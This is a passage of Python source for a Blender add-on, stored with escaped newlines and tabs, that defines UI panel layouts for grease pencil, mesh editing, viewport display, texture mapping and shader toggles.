Keyframes\")\n\tcol.label(text=\"Constraints:\")\n\tcol.operator(\"rigidbody.connect\", text=\"Connect\")\n\ndef VIEW3D_TP_relation(layout, context):\n\tcol = layout.column(align=True)\n\n\tcol.label(text=\"Group:\")\n\tcol.operator(\"group.create\", text=\"New Group\")\n\tcol.operator(\"group.objects_add_active\", text=\"Add to Active\")\n\tcol.operator(\"group.objects_remove\", text=\"Remove from Group\")\n\n\tcol.separator()\n\n\tcol.label(text=\"Parent:\")\n\trow = col.row(align=True)\n\trow.operator(\"object.parent_set\", text=\"Set\")\n\trow.operator(\"object.parent_clear\", text=\"Clear\")\n\n\tcol.separator()\n\n\tcol.label(text=\"Object Data:\")\n\tcol.operator(\"object.make_links_data\")\n\tcol.operator(\"object.make_single_user\")\n\n\tcol.separator()\n\n\tcol.label(text=\"Linked Objects:\")\n\tcol.operator(\"object.make_local\")\n\tcol.operator(\"object.proxy_make\")\n\ndef draw_keyframing_tools(context, layout):\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Keyframes:\")\n\trow = col.row(align=True)\n\trow.operator(\"anim.keyframe_insert_menu\", text=\"Insert\")\n\trow.operator(\"anim.keyframe_delete_v3d\", text=\"Remove\")\n\ndef VIEW3D_TP_animation(layout, context):\n\tdraw_keyframing_tools(context, layout)\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Motion Paths:\")\n\trow = col.row(align=True)\n\trow.operator(\"object.paths_calculate\", text=\"Calculate\")\n\trow.operator(\"object.paths_clear\", text=\"Clear\")\n\n\tcol.separator()\n\n\tcol.label(text=\"Action:\")\n\tcol.operator(\"nla.bake\", text=\"Bake Action\")\n\ndef gpencil_stroke_placement_settings(context, layout, gpd):\n\tcol = layout.column(align=True)\n\n\tcol.label(text=\"Stroke Placement:\")\n\n\trow = col.row(align=True)\n\trow.prop_enum(gpd, \"draw_mode\", 'VIEW')\n\trow.prop_enum(gpd, \"draw_mode\", 'CURSOR')\n\n\tif context.space_data.type == 'VIEW_3D':\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(gpd, \"draw_mode\", 'SURFACE')\n\t\trow.prop_enum(gpd, \"draw_mode\", 'STROKE')\n\n\t\trow = col.row(align=False)\n\t\trow.active = gpd.draw_mode in {'SURFACE', 'STROKE'}\n\t\trow.prop(gpd, \"use_stroke_endpoints\")\n\ndef VIEW3D_TP_greasepencil(layout, context):\n\tcol = layout.column(align=True)\n\n\tcol.label(text=\"Draw:\")\n\trow = col.row(align=True)\n\trow.operator(\"gpencil.draw\", text=\"Draw\").mode = 'DRAW'\n\trow.operator(\"gpencil.draw\", text=\"Erase\").mode = 'ERASER'\n\n\trow = col.row(align=True)\n\trow.operator(\"gpencil.draw\", text=\"Line\").mode = 'DRAW_STRAIGHT'\n\trow.operator(\"gpencil.draw\", text=\"Poly\").mode = 'DRAW_POLY'\n\n\trow = col.row(align=True)\n\trow.prop(context.tool_settings, \"use_grease_pencil_sessions\", text=\"Continuous Drawing\")\n\n\tif context.space_data.type in {'VIEW_3D', 'CLIP_EDITOR'}:\n\t\tcol.separator()\n\t\tcol.label(\"Data Source:\")\n\t\trow = col.row(align=True)\n\t\tif context.space_data.type == 'VIEW_3D':\n\t\t\trow.prop(context.tool_settings, \"grease_pencil_source\", expand=True)\n\t\telif context.space_data.type == 'CLIP_EDITOR':\n\t\t\trow.prop(context.space_data, \"grease_pencil_source\", expand=True)\n\n\tgpd = context.gpencil_data\n\tif gpd:\n\t\tcol.separator()\n\t\tgpencil_stroke_placement_settings(context, col, gpd)\n\n\tif context.space_data.type == 'VIEW_3D':\n\t\tcol.separator()\n\t\tcol.separator()\n\n\t\tcol.label(text=\"Tools:\")\n\t\tcol.operator(\"gpencil.convert\", text=\"Convert...\")\n\t\tcol.operator(\"view3d.ruler\")\n\n\tgpd = context.gpencil_data\n\tedit_ok = bool(context.editable_gpencil_strokes) and bool(gpd.use_stroke_edit_mode)\n\n\tcol = layout.column(align=True)\n\tcol.prop(gpd, \"use_stroke_edit_mode\", text=\"Enable Editing\", icon='EDIT', toggle=True)\n\n\tcol.separator()\n\n\tcol.label(text=\"Select:\")\n\tsubcol = col.column(align=True)\n\tsubcol.active = edit_ok\n\tsubcol.operator(\"gpencil.select_all\", text=\"Select All\")\n\tsubcol.operator(\"gpencil.select_border\")\n\tsubcol.operator(\"gpencil.select_circle\")\n\n\tcol.separator()\n\n\tsubcol = col.column(align=True)\n\tsubcol.active = edit_ok\n\tsubcol.operator(\"gpencil.select_linked\")\n\tsubcol.operator(\"gpencil.select_more\")\n\tsubcol.operator(\"gpencil.select_less\")\n\n\tcol.separator()\n\n\tcol.label(text=\"Edit:\")\n\trow = col.row(align=True)\n\trow.active = edit_ok\n\trow.operator(\"gpencil.copy\", text=\"Copy\")\n\trow.operator(\"gpencil.paste\", text=\"Paste\")\n\n\tsubcol = col.column(align=True)\n\tsubcol.active = edit_ok\n\tsubcol.operator(\"gpencil.delete\", text=\"Delete\")\n\tsubcol.operator(\"gpencil.duplicate_move\", text=\"Duplicate\")\n\tsubcol.operator(\"transform.mirror\", text=\"Mirror\").gpencil_strokes = True\n\n\tcol.separator()\n\n\tsubcol = col.column(align=True)\n\tsubcol.active = edit_ok\n\tsubcol.operator(\"transform.translate\").gpencil_strokes = True # icon='MAN_TRANS'\n\tsubcol.operator(\"transform.rotate\").gpencil_strokes = True # icon='MAN_ROT'\n\tsubcol.operator(\"transform.resize\", text=\"Scale\").gpencil_strokes = True # icon='MAN_SCALE'\n\n\tcol.separator()\n\n\tsubcol = col.column(align=True)\n\tsubcol.active = edit_ok\n\tsubcol.operator(\"transform.bend\", text=\"Bend\").gpencil_strokes = True\n\tsubcol.operator(\"transform.shear\", text=\"Shear\").gpencil_strokes = True\n\tsubcol.operator(\"transform.tosphere\", text=\"To Sphere\").gpencil_strokes = True\n\n\n\ndef VIEW3D_PP_motiontracking(layout, context):\n\tv3d = GUI.get_screen_area(type = \"VIEW_3D\")\n\tlayout.prop(v3d, \"show_reconstruction\", text=\"Motion Tracking\")\n\tif v3d.show_reconstruction:\n\t\tcol = layout.column()\n\t\tcol.prop(v3d, \"show_camera_path\", text=\"Camera Path\")\n\t\tcol.prop(v3d, \"show_bundle_names\", text=\"3D Marker Names\")\n\t\tcol.label(text=\"Track Type and Size:\")\n\t\trow = col.row(align=True)\n\t\trow.prop(v3d, \"tracks_draw_type\", text=\"\")\n\t\trow.prop(v3d, \"tracks_draw_size\", text=\"\")\n\ndef VIEW3D_TP_meshedit(layout, context):\n\tmode = MESH.get_selection_mode()\n\tif mode == \"OBJECT\":\n\t\tmesh_edit_object_mode(layout, context)\n\telse:\n\t\tmesh_edit_edit_mode(layout, context)\ndef mesh_edit_edit_mode(layout, context):\n\tr\"\"\" Taken from blender mesh edit layout\"\"\"\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Deform:\")\n\trow = col.row(align=True)\n\trow.operator(\"transform.edge_slide\", text=\"Slide Edge\")\n\trow.operator(\"transform.vert_slide\", text=\"Vertex\")\n\tcol.operator(\"mesh.noise\")\n\tcol.operator(\"mesh.vertices_smooth\")\n\tcol.operator(\"transform.vertex_random\")\n\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Add:\")\n\n\tcol.menu(\"VIEW3D_MT_edit_mesh_extrude\")\n\tcol.operator(\"view3d.edit_mesh_extrude_move_normal\", text=\"Extrude Region\")\n\tcol.operator(\"view3d.edit_mesh_extrude_individual_move\", text=\"Extrude Individual\")\n\tcol.operator(\"mesh.inset\", text=\"Inset Faces\")\n\tcol.operator(\"mesh.edge_face_add\")\n\tcol.operator(\"mesh.subdivide\")\n\tcol.operator(\"mesh.loopcut_slide\")\n\tcol.operator(\"mesh.offset_edge_loops_slide\")\n\tcol.operator(\"mesh.duplicate_move\", text=\"Duplicate\")\n\trow = col.row(align=True)\n\trow.operator(\"mesh.spin\")\n\trow.operator(\"mesh.screw\")\n\n\trow = col.row(align=True)\n\tprops = row.operator(\"mesh.knife_tool\", text=\"Knife\")\n\tprops.use_occlude_geometry = True\n\tprops.only_selected = False\n\tprops = row.operator(\"mesh.knife_tool\", text=\"Select\")\n\tprops.use_occlude_geometry = False\n\tprops.only_selected = True\n\tcol.operator(\"mesh.knife_project\")\n\tcol.operator(\"mesh.bisect\")\n\n\tcol = layout.column(align=True)\n\tcol.label(text=\"Remove:\")\n\tcol.menu(\"VIEW3D_MT_edit_mesh_delete\")\n\tcol.operator_menu_enum(\"mesh.merge\", \"type\")\n\tcol.operator(\"mesh.remove_doubles\")\n\ndef mesh_edit_object_mode(layout, context):\n\tr\"\"\" Taken from blender mesh edit layout\"\"\"\n\tcol = layout.column(align=True)\n\tcol.operator(\"object.duplicate_move\", text=\"Duplicate\")\n\tcol.operator(\"object.duplicate_move_linked\", text=\"Duplicate Linked\")\n\n\tcol.operator(\"object.delete\")\n\n\tobj = context.active_object\n\tif obj:\n\t\tobj_type = obj.type\n\n\t\tif obj_type in {'MESH', 'CURVE', 'SURFACE', 'ARMATURE'}:\n\t\t\tcol = layout.column(align=True)\n\t\t\tcol.operator(\"object.join\")\n\n\t\tif obj_type in {'MESH', 'CURVE', 'SURFACE', 'ARMATURE', 'FONT', 'LATTICE'}:\n\t\t\tcol = layout.column(align=True)\n\t\t\tcol.operator_menu_enum(\"object.origin_set\", \"type\", text=\"Set Origin\")\n\n\t\tif obj_type in {'MESH', 'CURVE', 'SURFACE'}:\n\t\t\tcol = layout.column(align=True)\n\t\t\tcol.label(text=\"Shading:\")\n\t\t\trow = col.row(align=True)\n\t\t\trow.operator(\"object.shade_smooth\", text=\"Smooth\")\n\t\t\trow.operator(\"object.shade_flat\", text=\"Flat\")\n\n\t\tif obj_type == 'MESH':\n\t\t\tcol = layout.column(align=True)\n\t\t\tcol.label(text=\"Data Transfer:\")\n\t\t\trow = col.row(align=True)\n\t\t\trow.operator(\"object.data_transfer\", text=\"Data\")\n\t\t\trow.operator(\"object.datalayout_transfer\", text=\"Data Layout\")\n\n\ndef bsi_modeling_panel(layout, context):\n\tcol = layout.column(align=True)\n\tcol.operator(\"wm.bsi_decorator_button\",text=\"Get\")\n\tcol.menu(\"INFO_MT_bsi_primitive\", text=\"Primitive\")\n\tcol.menu(\"INFO_MT_bsi_material\", text=\"Material\")\n\tcol.menu(\"INFO_MT_bsi_property\", text=\"Property\")\n\n\tcol = layout.column(align=True)\n\tcol.operator(\"wm.bsi_decorator_button\",text=\"Create\")\n\tcol.menu(\"VIEW3D_MT_BSI_curve_create\", text=\"Curve\")\n\tcol.menu(\"INFO_MT_add\", text=\"Surf.Mesh\")\n\tcol.menu(\"INFO_MT_add\", text=\"Poly.Mesh\")\n\tcol.menu(\"INFO_MT_add\", text=\"Skeleton\")\n\tcol.menu(\"INFO_MT_add\", text=\"Model\")\n\tcol.menu(\"INFO_MT_add\", text=\"Text\")\n\n\tlayout = self.layout\n\tcol = layout.column(align=True)\n\tcol.operator(\"wm.bsi_decorator_button\",text=\"Modify\")\n\tcol.menu(\"INFO_MT_add\", text=\"Curve\")\n\tcol.menu(\"INFO_MT_add\", text=\"Surf.Mesh\")\n\tcol.menu(\"INFO_MT_add\", text=\"Poly.Mesh\")\n\tcol.menu(\"INFO_MT_add\", text=\"Deform\")\n\tcol.menu(\"INFO_MT_add\", text=\"Model\")\n\ndef viewport_shading_panel(layout, context):\n\tv3d \t= GUI.get_screen_area(\"VIEW_3D\")\n\tscene \t= context.scene\n\n\tbox = layout.box()\n\tbox.label(text= \"Viewport Shading\")\n\tcol = box.column()\n\tcol.prop(context.scene, \"boundbox\", text=\"Bounding Box\")\n\tcol.prop(context.scene, \"wireframe\", text=\"Wireframe\")\n\tcol.prop(context.scene, \"constant\", text=\"Constant\")\n\tcol.prop(context.scene, \"solid\", text=\"Shaded\")\n\tcol.prop(context.scene, \"textured\", text=\"Textured\")\n\tcol.prop(context.scene, \"textured_decal\", text=\"Textured Decal\")\n\ndef viewport_fx_panel(layout, context):\n\tv3d \t\t\t= GUI.get_screen_area(\"VIEW_3D\")\n\tscene \t\t\t= context.scene\n\tgame_settings \t= scene.game_settings\n\tbox = layout.box()\n\tbox.label(text= \"FX Shading\")\n\tcol = box.column()\n\tif not scene.render.use_shading_nodes:\n\t\tcol.prop(game_settings, \"material_mode\", text=\"\")\n\n\tif v3d.viewport_shade == 'SOLID':\n\t\tcol.prop(v3d, \"use_matcap\")\n\t\tif v3d.use_matcap:\n\t\t\tcol.template_icon_view(v3d, \"matcap_icon\")\n\t\tif not v3d.use_matcap:\n\t\t\tcol.prop(v3d, \"show_textured_solid\")\n\n\tfx_settings = v3d.fx_settings\n\n\tif v3d.viewport_shade not in {'BOUNDBOX', 'WIREFRAME'}:\n\t\tsub = col.column()\n\t\tsub.active = v3d.region_3d.view_perspective == 'CAMERA'\n\t\tsub.prop(fx_settings, \"use_dof\")\n\t\tcol.prop(fx_settings, \"use_ssao\", text=\"Ambient Occlusion\")\n\t\tif fx_settings.use_ssao:\n\t\t\tssao_settings = fx_settings.ssao\n\t\t\tsubcol = col.column(align=True)\n\t\t\tsubcol.prop(ssao_settings, \"factor\")\n\t\t\tsubcol.prop(ssao_settings, \"distance_max\")\n\t\t\tsubcol.prop(ssao_settings, \"attenuation\")\n\t\t\tsubcol.prop(ssao_settings, \"samples\")\n\t\t\tsubcol.prop(ssao_settings, \"color\")\n\n\tcol.prop(v3d, \"show_only_render\")\n\tcol.prop(v3d, \"show_world\")\n\ndef viewport_objects_panel(layout, context):\n\tv3d \t= GUI.get_screen_area(\"VIEW_3D\")\n\tscene \t= context.scene\n\tobj = context.object\n\tdisplay_all = v3d.show_only_render\n\tbox = layout.box()\n\tcol = box.column()\n\tcol.label(text=\"Object Shading\")\n\tif display_all:\n\t\tcol.label(text=\"Hidden because of \\\"Only Render\\\"\")\n\tif not display_all:\n\t\tcol.prop(context.scene, \"show_wire\", text=\"Wireframe On Shaded\")\n\t\tif v3d.viewport_shade not in {'BOUNDBOX', 'WIREFRAME'}:\n\t\t\tif obj and obj.mode == 'EDIT':\n\t\t\t\tcol.prop(context.scene, \"occlude_wire\", text=\"Occlude Wire\")\n\t\t\t\tcol.prop(v3d, \"show_occlude_wire\")\n\t\tcol.prop(context.scene, \"show_x_ray\", text=\"X Ray <--LAME\")\n\t\tcol.prop(context.scene, \"show_all_edges\", text=\"All Edges <--WTF is this\")\n\t\tcol.prop(context.scene, \"show_axis\", text=\"Axis\")\n\t\tcol.prop(context.scene, \"show_bounds\", text=\"Bounding Boxes\")\n\t\tcol.prop(context.scene, \"show_name\", text=\"Names\")\n\t\tcol.prop(context.scene, \"show_only_shape_key\", text=\"Shapes\")\n\t\tcol.prop(v3d, \"show_backface_culling\")\n\n\t\tif v3d.show_backface_culling:\n\t\t\tcol.prop(context.scene, \"show_transparent\", text=\"Hide Outline\")\n\t\tcol.prop(context.scene, \"show_texture_space\", text=\"Texture Space\")\n\t\tcol.prop(v3d, \"show_outline_selected\")\n\t\tcol.prop(v3d, \"show_all_objects_origin\", text = \"Object Origins\")\n\t\tcol.prop(v3d, \"show_relationship_lines\", text = \"Relationships\")\n\ndef viewport_widgets_panel(layout, context):\n\tv3d \t\t\t= GUI.get_screen_area(\"VIEW_3D\")\n\tscene \t\t\t= context.scene\n\n\tbox = layout.box()\n\tcol = box.column()\n\tcol.label(text=\"Viewport Widgets\")\n\tdisplay_all = v3d.show_only_render\n\tif display_all:\n\t\tcol.label(text=\"Hidden because of \\\"Only Render\\\"\")\n\tif not display_all:\n\t\tsplit = col.split(percentage=0.55)\n\t\tsplit.prop(v3d, \"show_floor\", text=\"Grid Floor\")\n\n\t\trow = split.row(align=True)\n\t\trow.prop(v3d, \"show_axis_x\", text=\"X\", toggle=True)\n\t\trow.prop(v3d, \"show_axis_y\", text=\"Y\", toggle=True)\n\t\trow.prop(v3d, \"show_axis_z\", text=\"Z\", toggle=True)\n\n\t\tsub = col.column(align=True)\n\t\tsub.prop(v3d, \"grid_lines\", text=\"Lines\")\n\t\tsub.prop(v3d, \"grid_scale\", text=\"Scale\")\n\t\tcol.prop(v3d ,\"cursor_location\")\n\t\tsubsub = sub.column(align=True)\n\t\tsubsub.active = scene.unit_settings.system == 'NONE'\n\t\tsubsub.prop(v3d, \"grid_subdivisions\", text=\"Subdivisions\")\n\n\t\tbox.operator(\"screen.region_quadview\", text=\"Toggle Quad View\")\n\n\t\tif v3d.region_quadviews:\n\t\t\tregion = v3d.region_quadviews[2]\n\t\t\tcol = box.column()\n\t\t\tcol.prop(region, \"lock_rotation\")\n\t\t\trow = col.row()\n\t\t\trow.enabled = region.lock_rotation\n\t\t\trow.prop(region, \"show_sync_view\")\n\t\t\trow = col.row()\n\t\t\trow.enabled = region.lock_rotation and region.show_sync_view\n\t\t\trow.prop(region, \"use_box_clip\")\n\ndef viewport_properties_panel(layout, context):\n\tviewport_shading_panel(layout, context)\n\tviewport_fx_panel(layout, context)\n\tviewport_objects_panel(layout, context)\n\tviewport_widgets_panel(layout, context)\n\n##########################################################\n# dynamic prop panel methods\n##########################################################\n\n\ndef ANKI_PP_home(layout, context):\n\tscene = context.scene\n\n\t# Create a simple row.\n\tlayout.label(text=\" Simple Row:\")\n\n\trow = layout.row()\n\trow.prop(scene, \"frame_start\")\n\trow.prop(scene, \"frame_end\")\n\trow.prop(scene, \"frame_end\")\n\trow.prop(scene, \"frame_end\")\n\n\t# Create an row where the buttons are aligned to each other.\n\tlayout.label(text=\" Aligned Row:\")\n\n\trow = layout.row(align=True)\n\trow.prop(scene, \"frame_start\")\n\trow.prop(scene, \"frame_end\")\n\n\t# Create two columns, by using a split layout.\n\tsplit = layout.split()\n\n\t# First column\n\tcol = split.column()\n\tcol.label(text=\"Column One:\")\n\tcol.prop(scene, \"frame_end\")\n\tcol.prop(scene, \"frame_start\")\n\n\t# Second column, aligned\n\tcol = split.column(align=True)\n\tcol.label(text=\"Column Two:\")\n\tcol.prop(scene, \"frame_start\")\n\tcol.prop(scene, \"frame_end\")\n\n\t# Big render button\n\tlayout.label(text=\"Big Button:\")\n\trow = layout.row()\n\trow.scale_y = 3.0\n\trow.operator(\"render.render\")\n\n\t# Different sizes in a row\n\tlayout.label(text=\"Different button sizes:\")\n\trow = layout.row(align=True)\n\trow.operator(\"render.render\")\n\n\tsub = row.row()\n\tsub.scale_x = 2.0\n\tsub.operator(\"render.render\")\n\n\trow.operator(\"render.render\")\n\ndef uv_tiling_layout(layout, texture_node):\n\tr\"\"\" UV tiling properties\"\"\"\n\tbox =layout.box()\n\tbox.prop(texture_node, \"extension\", text= \"\")\n\tcol = box.column(align=True)\n\trow = col.row(align=True)\n\n\tif texture_node.extension == 'REPEAT':\n\t\trow.label(text=\"Mirror and Repeat:\")\n\t\tcol = box.column(align=True)\n\t\trow = col.row()\n\t\trow.prop(texture_node, \"use_mirror_x\", text=\"\",\n\t\t\t\t\ticon_value=(ico[\"toggle_on\"].icon_id\n\t\t\t\t\tif texture_node.use_mirror_x\n\t\t\t\t\telse ico[\"toggle_off\"].icon_id ),\n\t\t\t\t\temboss=False)\n\t\trow.prop(texture_node, \"repeat_x\", text=\"Repeat X\")\n\t\trow.active = (texture_node.repeat_x > 1)\n\n\t\trow = col.row()\n\t\trow.prop(texture_node, \"use_mirror_y\", text=\"\",\n\t\t\ticon_value=(ico[\"toggle_on\"].icon_id\n\t\t\tif texture_node.use_mirror_y\n\t\t\telse ico[\"toggle_off\"].icon_id ),\n\t\t\temboss=False)\n\t\trow.prop(texture_node, \"repeat_y\", text=\"Repeat Y\")\n\t\trow.active = (texture_node.repeat_y > 1)\n\n\telif texture_node.extension == 'CHECKER':\n\t\trow = col.row(align=True)\n\t\trow.prop(texture_node, \"use_checker_even\", text=\"Even\",\n\t\t\ticon_value=(ico[\"toggle_on\"].icon_id\n\t\t\tif texture_node.use_checker_even\n\t\t\telse ico[\"toggle_off\"].icon_id ),\n\t\t\temboss=False)\n\t\trow.prop(texture_node, \"use_checker_odd\", text=\"Odd\",\n\t\t\ticon_value=(ico[\"toggle_on\"].icon_id\n\t\t\tif texture_node.use_checker_odd\n\t\t\telse ico[\"toggle_off\"].icon_id ),\n\t\t\temboss=False)\n\n\t\tcol = box.column(align=True)\n\t\tcol.prop(texture_node, \"checker_distance\", text=\"Distance\")\n\n\tcol.label(text=\"Crop:\")\n\trow = col.row(align=True)\n\trow.prop(texture_node, \"crop_min_y\", text=\"Min Y\")\n\trow.prop(texture_node, \"crop_max_x\", text=\"Max X\")\n\trow = col.row(align=True)\n\trow.prop(texture_node, \"crop_min_x\", text=\"Min Y\")\n\trow.prop(texture_node, \"crop_max_y\", text=\"Max Y\")\n\ndef common_texture_filter(tex, col):\n\trow = col.row(align=True)\n\trow.label(text=\":: Filter Properties\" )\n\trow.label(text=\"\" )\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"filter_type\", text=\"\")\n\tif tex.use_mipmap and tex.filter_type in {'AREA', 'EWA', 'FELINE'}:\n\t\tif tex.filter_type == 'FELINE':\n\t\t\trow.prop(tex, \"filter_probes\", text=\"Probes\")\n\t\telse:\n\t\t\trow.prop(tex, \"filter_eccentricity\", text=\"Eccentricity\")\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_filter_size_min\", text=\"Min Size\")\n\trow.prop(tex, \"filter_size\")\n\ndef uv_projection_layout(layout, texture_slot, object_node):\n\tr\"\"\"UV layout and project types \"\"\"\n\tbox =layout.box()\n\tcol = box.column(align=True)\n\trow = col.row(align=True)\n\trow.prop(texture_slot, \"texture_coords\", text=\"\")\n\trow.prop(texture_slot, \"mapping\", text=\"\")\n\tif texture_slot.texture_coords == 'UV':\n\t\trow.prop_search(texture_slot, \"uv_layer\", object_node.data, \"uv_textures\", text=\"\")\n\telif texture_slot.texture_coords == 'OBJECT':\n\t\trow.prop(texture_slot, \"object\", text=\"\")\n\trow.operator(\"mesh.uv_texture_add\", text=\"\", icon='ZOOMIN')\n\n\tcol = box.column(align=True)\n\trow = col.row(align=True)\n\tif texture_slot.texture_coords in {'ORCO', 'UV'}:\n\t\trow.prop(texture_slot, \"use_from_dupli\", text=\"\",\n\t\t\t\t icon_value=(ico[\"toggle_on\"].icon_id\n\t\t\t\t\t\t\t\tif texture_slot.use_from_dupli\n\t\t\t\t\t\t\t\telse ico[\"toggle_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\n\trow.prop(texture_slot, \"mapping_x\", text=\"\")\n\trow.prop(texture_slot, \"mapping_y\", text=\"\")\n\trow.prop(texture_slot, \"mapping_z\", text=\"\")\n\n\tcol = box.column(align=True)\n\trow = box.row(align=True)\n\trow = col.row(align=True)\n\n\trow.column().prop(texture_slot, \"offset\")\n\trow.column().prop(texture_slot, \"scale\")\n\ndef texture_sampling_layout(layout, texture_slot):\n\tslot = texture_slot #getattr(context, \"texture_slot\", None)\n\ttex = slot.texture #context.texture\n\tbox =layout.box()\n\tcol = box.column(align=True)\n\n\trow = col.row(align=True)\n\trow.label(text=\":: Alpha Properties\" )\n\trow.label(text=\"\" )\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_preview_alpha\")\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_alpha\", text=\"Use\")\n\trow.prop(tex, \"use_calculate_alpha\", text=\"Calculate\")\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"invert_alpha\", text=\"Invert\")\n\trow.prop(tex, \"use_flip_axis\", text=\"Flip X/Y Axis\")\n\n\tcol.separator()\n\trow = col.row(align=True)\n\trow.label(text=\":: Normal Properties\" )\n\trow.label(text=\"\" )\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_normal_map\")\n\trow.active = tex.use_normal_map\n\trow.prop(slot, \"normal_map_space\", text=\"\")\n\trow.active = tex.use_normal_map\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_mipmap\")\n\trow.prop(tex, \"use_derivative_map\")\n\trow.active = tex.use_mipmap\n\n\trow = col.row(align=True)\n\trow.prop(tex, \"use_mipmap_gauss\", text =\"MIP Blur\")\n\trow.prop(tex, \"use_interpolation\")\n\n\tcol.separator()\n\tcommon_texture_filter(tex, col)\n\ndef texture_influence_layout(layout, texture_slot, port_type=\"diffuse\"):\n\ttex = texture_slot\n\tbox =layout.box()\n\tcol = box.column()\n\tif port_type == \"diffuse\":\n\t\tGUI.button_slider(col, texture_slot, \"use_map_diffuse\", \"diffuse_factor\", \"Intensity\")\n\t\tGUI.button_slider(col, texture_slot, \"use_map_color_diffuse\", \"diffuse_color_factor\", \"Color\")\n\t\tGUI.button_slider(col, texture_slot, \"use_map_alpha\", \"alpha_factor\", \"Alpha\")\n\t\tGUI.button_slider(col, texture_slot, \"use_map_translucency\", \"translucency_factor\", \"Translucency\")\n\tif port_type == \"specular\":\n\t\tGUI.button_slider(col, texture_slot,\"use_map_specular\", \"specular_factor\", \"Intensity\")\n\t\tGUI.button_slider(col, texture_slot,\"use_map_hardness\", \"hardness_factor\", \"Hardness\")\n\t\tGUI.button_slider(col, texture_slot,\"use_map_color_spec\", \"specular_color_factor\", \"Color\")\n\tcol = box.column(align=False)\n\trow = col.row(align =True)\n\trow.prop(texture_slot, \"blend_type\", text=\"\")\n\trow = col.row(align =True)\n\trow.prop(texture_slot, \"invert\", text=\"Negative\")\n\trow.prop(texture_slot, \"use_stencil\")\n\t# color is used on gray-scale textures even when use_rgb_to_intensity is disabled.\n\trow = col.row(align =True)\n\trow.prop(texture_slot, \"use_rgb_to_intensity\")\n\tif texture_slot.use_rgb_to_intensity:\n\t\trow.prop(texture_slot, \"color\", text=\"\")\n\n\trow = col.row(align =True)\n\trow.prop(texture_slot, \"default_value\", text=\"DVar\", slider=True)\n\ndef shader_property_layout(context, layout, material):\n\tcol = layout.column(align=True)\n\trow = col.row(align=True)\n\trow.operator(\"wm.bsi_decorator_button\", text=\"\", emboss=False) # pushes to the right top buttons\n\n\trow.prop( material.BSI, \"shader_stand\", text=\"\",\n\t\t\t icon_value=(ico[\"shader_strand_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.shader_stand\n\t\t\t\t\t\t\telse ico[\"shader_strand_off\"].icon_id ),\n\t\t\t emboss=False)\n\n\trow.prop( material.BSI, \"indirect_illum\", text=\"\",\n\t\t\t icon_value=(ico[\"shader_shading_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.indirect_illum\n\t\t\t\t\t\t\telse ico[\"shader_shading_off\"].icon_id ),\n\t\t\t emboss=False)\n\n\trow.prop( material.BSI, \"shader_rendering\", text=\"\",\n\t\t\t icon=('RESTRICT_RENDER_OFF'\n\t\t\t\t\t\t\tif material.BSI.shader_rendering\n\t\t\t\t\t\t\telse 'RESTRICT_RENDER_ON' ),\n\t\t\t emboss=False)\n\n\trow.prop( material.BSI, \"shader_shadow\", text=\"\",\n\t\t\t icon_value=(ico[\"shader_shadow_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.shader_shadow\n\t\t\t\t\t\t\telse ico[\"shader_shadow_off\"].icon_id ),\n\t\t\t emboss=False)\n\n\trow.prop( material.BSI, \"shader_sss\", text=\"\",\n\t\t\t icon_value=(ico[\"shader_sss_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.shader_sss\n\t\t\t\t\t\t\telse ico[\"shader_sss_off\"].icon_id ),\n\t\t\t emboss=False)\n\trow.prop( material.BSI, \"shader_transparency\", text=\"\",\n\t\t\t icon_value=(ico[\"shader_transparency_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.shader_transparency\n\t\t\t\t\t\t\telse ico[\"shader_transparency_off\"].icon_id ),\n\t\t\t emboss=False)\n\trow.prop( material.BSI, \"shader_reflection\", text=\"\",\n\t\t\t icon_value=(ico[\"shader_reflect_on\"].icon_id\n\t\t\t\t\t\t\tif material.BSI.shader_reflection\n\t\t\t\t\t\t\telse ico[\"shader_reflect_off\"].icon_id ),\n\t\t\t emboss=False)\n\n\tif material.BSI.shader_stand:\n\t\tshader_strand_layout(context, layout, material)\n\n\tif material.BSI.indirect_illum:\n\t\tshader_indirect_illum_layout(layout, material)\n\n\tif material.BSI.shader_rendering:\n\t\tshader_rendering_layout(layout, material)\n\n\tif material.BSI.shader_shadow:\n\t\tshader_shadow_layout(layout, material)\n\n\tif material.BSI.shader_sss:\n\t\tshader_sss(layout, material)\n\n\tif material.BSI.shader_transparency:\n\t\tshader_transparency(layout, material)\n\n\tif material.BSI.shader_reflection:\n\t\tshader_reflection(layout, material)\n\ndef shader_ramp_layout(layout, material):\n\tbox = layout.box()\n\tbox.prop(material, \"use_diffuse_ramp\", text=\"Use Ramp Shader\")\n\tif material.use_diffuse_ramp:\n\t\tcol = box.column()\n\t\tcol.active = (not material.use_shadeless)\n\t\tcol.separator()\n\t\tcol.template_color_ramp(material, \"diffuse_ramp\", expand=True)\n\t\tcol.separator()\n\n\t\trow = col.row()\n\t\trow.prop(material, \"diffuse_ramp_input\", text=\"Input\")\n\t\trow.prop(material, \"diffuse_ramp_blend\", text=\"Blend\")\n\n\t\tcol.prop(material, \"diffuse_ramp_factor\", text=\"Factor\")\n\ndef shader_strand_layout(context, layout, material):\n\tbox = layout.box()\n\tbox.label(text=\"Strand Properties\")\n\ttan = material.strand\n\n\tcol = box.column(align=True)\n\tcol.prop(tan, \"use_blender_units\")\n\tcol.prop(tan, \"root_size\", text=\"Size Root\")\n\tcol.prop(tan, \"tip_size\", text=\"Size Tip\")\n\tcol.prop(tan, \"size_min\", text=\"Size Min\")\n\n\tcol = box.column(align=True)\n\tcol.active = (not material.use_shadeless)\n\tcol.prop(tan, \"use_tangent_shading\")\n\tcol.prop(tan, \"shape\", text=\"Tangent Shape\")\n\n\tcol = box.column(align=True)\n\trow = col.row(align=True)\n\trow.prop(tan, \"width_fade\", 